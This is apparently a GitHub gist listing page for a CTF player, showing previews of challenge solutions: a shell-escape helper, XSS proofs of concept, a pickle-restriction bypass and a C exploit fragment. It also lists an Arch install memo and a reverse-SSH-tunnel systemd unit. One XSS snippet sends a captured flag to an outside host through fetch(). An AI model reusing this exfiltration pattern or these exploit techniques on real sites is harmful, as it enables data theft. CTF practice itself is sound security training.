Skip to content

Instantly share code, notes, and snippets.

Avatar

Ryo ICHIKAWA icchy

View GitHub Profile
@icchy
icchy / x.py
Created Oct 11, 2020
SECCON CTF 2020 - WAFthrough
View x.py
from urllib.request import urlopen
from urllib import request
import string
def escape(val):
return '''
$'\\\\{}'
'''[1:-1].format(val)
@icchy
icchy / poc.html
Last active Apr 27, 2021
TSGCTF Note (both 1 and 2)
View poc.html
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<iframe name=f width=100 height=100></iframe>
<script>
@icchy
icchy / q.html
Last active Apr 27, 2021
Pwn2Win 2020 matrona v2
View q.html
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<script>
window.addEventListener('hashchange', (evt) => {
const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0]
fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`)
})
</script>
@icchy
icchy / solve.py
Created Oct 7, 2019
Balsn CTF 2019 pyshv1
View solve.py
import pickle
import io
whitelist = ['sys']
# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
print(module)
@icchy
icchy / exp.c
Created Sep 2, 2019
Oneline Calc
View exp.c
123;
return 123;
}
extern void *opendir(const char *);
extern void *readdir(void *);
extern void *shmat(int, const void *, int);
typedef struct {
ino_t d_ino;
off_t d_off;
unsigned short d_reclen;
@icchy
icchy / server.go
Created Aug 7, 2019
Antivirus Oracle demo server
View server.go
package main
import (
"bytes"
"crypto/rand"
"crypto/sha256"
"encoding/gob"
"fmt"
"io/ioutil"
"log"
@icchy
icchy / install.md
Last active Nov 27, 2018
ArchLinux installation memo
View install.md

partitioning (GPT, EFI)

  • /boot 200MB fat32 (EFI System)
    • mkfs.fat -F32 /dev/sdX1
  • / rest xfs (Linux filesystem)
    • mkfs.xfs /dev/sdX2
    • xfs_admin -L "arch_os" /dev/sdX2 # label partition

install base system

mkdir -p /mnt/boot
@icchy
icchy / autossh.service
Last active Jan 30, 2018
persistent reverse port forward with systemd
View autossh.service
[Unit]
Description = SSH daemon for rescure
After = network.target
[Service]
ExecStart = /usr/bin/ssh \
-N \
-o "ExitOnForwardFailure=yes" \
-o "StrictHostKeyChecking=no" \
-o "UserKnownHostsFile=/dev/null" \
@icchy
icchy / sync.sh
Last active Jan 30, 2018
rsync with fswatch
View sync.sh
#!/bin/sh
remote_dir=host:path/to/remote/dir
local_dir=path/to/local/dir
usage () {
echo "usage: $0 [pull|push|sync]" >&2
}
check () {
View keybase.md

Keybase proof

I hereby claim:

  • I am icchy on github.
  • I am icchy (https://keybase.io/icchy) on keybase.
  • I have a public key ASBwarXZmL7KF-RQSjS7SklMWOI0P1w5L7t-fsMNwpDW-Qo

To claim this, I am signing this object: